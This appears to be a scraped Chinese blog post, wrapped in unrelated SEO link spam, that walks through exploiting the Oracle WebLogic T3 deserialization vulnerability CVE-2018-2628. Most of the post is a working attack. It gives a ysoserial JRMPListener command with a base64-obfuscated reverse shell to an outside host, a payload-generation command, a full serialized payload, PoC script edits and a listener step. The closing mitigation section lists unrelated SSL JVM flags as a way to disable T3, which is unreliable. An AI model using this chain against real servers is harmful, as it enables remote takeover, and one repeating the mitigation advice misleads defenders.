当前位置: 首页 > news >正文

网站怎么做 流程/网站seo外链

网站怎么做 流程,网站seo外链,北京建设信息网,行业网站推广外包介绍: 是一个影响 Oracle WebLogic Server 的严重漏洞,属于 远程代码执行(RCE) 漏洞。以下是对该漏洞的详细分析: ● 漏洞类型: 远程代码执行(RCE) ● 影响范围:Oracle WebLogic Server 10.3.6.0, 12.1.3.0, 12.2.1.2…

介绍:

是一个影响 Oracle WebLogic Server 的严重漏洞,属于 远程代码执行(RCE) 漏洞。以下是对该漏洞的详细分析:
● 漏洞类型: 远程代码执行(RCE)
● 影响范围:Oracle WebLogic Server 10.3.6.0, 12.1.3.0, 12.2.1.2, 12.2.1.3
● 漏洞等级:严重(CVSS 评分:9.8)

CVSS(Common Vulnerability Scoring
System,通用漏洞评分系统)是一种用于评估计算机系统漏洞严重程度的标准化评分体系。它通过量化指标对漏洞的威胁等级进行评分(0-10分),分数越高代表风险越高。

● 漏洞原理:攻击者可以通过 T3 协议发送恶意序列化数据,触发反序列化漏洞,从而在目标服务器上执行任何代码

T3协议是Oracle WebLogic
Server中用于分布式应用通信的专有协议,主要用于服务器与客户端、集群节点间的数据传输,尤其支持Java对象序列化传输。

● 漏洞影响:

  1. 远程代码执行
    ○ 攻击者可以在目标服务器上执行任意命令,完全控制服务器
  2. 数据泄露
    ○ 攻击者可以读取服务器上的敏感数据
  3. 服务器被接管
    ○ 攻击者可以植入后门、创建新用户或删除数据
    ● 漏洞利用:
工具地址:
https://github.com/Lighird/CVE-2018-2628     #在官方的文档中找到了需要使用的工具!
根据文档内容操作

在这里插入图片描述

直接使用ysoserial-0.1-cve-2018-2628-all.jar生成payload目的是将漏洞服务器和JRMP服务器建立连接
启动JRMP服务,目的是为了让weblogic服务器远程调用

连接jrmp服务poc

java -cp ysoserial-0.1-cve-2018-2628-all.jar ysoserial.exploit.JRMPListener  1234 Jdk7u21 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEyLjgvMTIzNCAwPiYx}|{base64,-d}|{bash,-i}"  #使用ysoserial来启动jrmp服务,监听1234端口 java环境大于11使用jdk7u21  bash -c 使用反弹shell 只需要kali监听即可

利用ysoserial-0.1-cve-2018-2628-all.jar生成payload

java -jar ysoserial-0.1-cve-2018-2628-all.jar JRMPClient2 192.168.12.8:1234 | xxd -p | tr -d $'\n' && echo

生成的payload

aced0005737d00000001001d6a6176612e726d692e61637469766174696f6e2e416374697661746f72787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707735000a556e6963617374526566000c3139322e3136382e31322e38000004d2fffffffff663bec100000000000000000000000000000078

打开漏洞利用工具目录下的 weblogic_poc.py 文件
修改两处
第一处将复制的payload替换原有的payload
在这里插入图片描述

第二处修改漏洞服务器的IP地址和端口
在这里插入图片描述
(这里介绍一下,ip地址为上述的12.8 也就是反弹的地址,端口号也一样)

kali 建立监听监听 1234 端口等待上线即可! ● 修复建议: ○ 官方补丁:
■ 升级到以下或者更高版本
● 10.3.6.0.180417
● 12.1.3.0.180417
● 12.2.1.3.180417 ○ 限制 T3 协议访问:
■ 使用防火墙安全着限制对 weblogic server T3 端口(默认 7001)的访问
■ 修改 weblogic server 配置,禁用 T3 协议

set WL_HOME=/path/to/weblogic
$WL_HOME/server/bin/setDomainEnv.sh
export JAVA_OPTIONS="-Dweblogic.security.allowCryptoJDefaultVerification=true -Dweblogic.security.SSL.ignoreHostnameVerification=true -Dweblogic.security.allowCryptoJDefaultPRNG=true -Dweblogic.security.allowCryptoJDefaultJCEVerification=true"
■ 监控日志 ● 检查 weblogc server 日志,发现可疑的 T3 请求

● 漏洞检测:
○ 手动检测:
■ 检查 weblogic server 版本是否在影响范围内
■ 使用漏洞扫描工具检测
■ 使用公开的 poc 脚本验证

总结

在联系过程中要去细致的掌握每一个知识点,多多重复,才有效果!

http://www.lryc.cn/news/577385.html

相关文章:

  • 广州淘宝网站建设/seo综合查询网站源码
  • 方庄网站建设/官网seo怎么做
  • 二维码公众号怎么制作/郴州网站seo外包
  • 自己做视频网站怎么让加载速度变快/长春seo排名外包
  • 网站设计制作工作室/营销推广策略有哪些
  • 湘潭做网站问下磐石网络/google搜索引擎
  • 哪个网站可以做印章图案/使用软件提高百度推广排名
  • 1.6 基于NICE接口的存储器访问通道扩展自定义指令的简单示例
  • 家装网站模板下载/站内推广和站外推广的区别
  • 怎样把录的视频做一下传到网站/流量推广平台
  • 重庆网站托管服务/百度一下你就知道移动官网
  • 网络安全公司排名2020/武汉久都seo
  • 网站安全防黑联盟/今天的新闻发布会
  • 网站建设费需要分摊吗/优化设计单元测试卷
  • 优秀网剧/郑州怎么优化网站排名靠前
  • wap网站开发教程/怎么推广比较好
  • 个人电脑做网站服务器教程/怎么建立企业网站
  • 杭州网站建设公司联系方式/青岛谷歌优化
  • 顺德微网站建设/百度网盘网页登录入口
  • 网站建设怎么支付款项/真正免费的网站建站平
  • 做视频教学网站/网址大全2345
  • iis部署网站 红叉/建站公司最新报价
  • 深圳坑梓网站建设/网站seo教程
  • 做旅游网站的需求分析/热门网站排名
  • 电子商务专业就业前景好不好/深圳百度seo优化
  • 网站设计培训学校有哪些/进一步优化落实
  • 北京 做网站 公司/seo技术培训江门
  • php网站制作软件/邯郸百度推广公司
  • 金蝶软件多少钱/重庆关键词优化平台
  • 烟台网站排名seo/重庆网站快速排名优化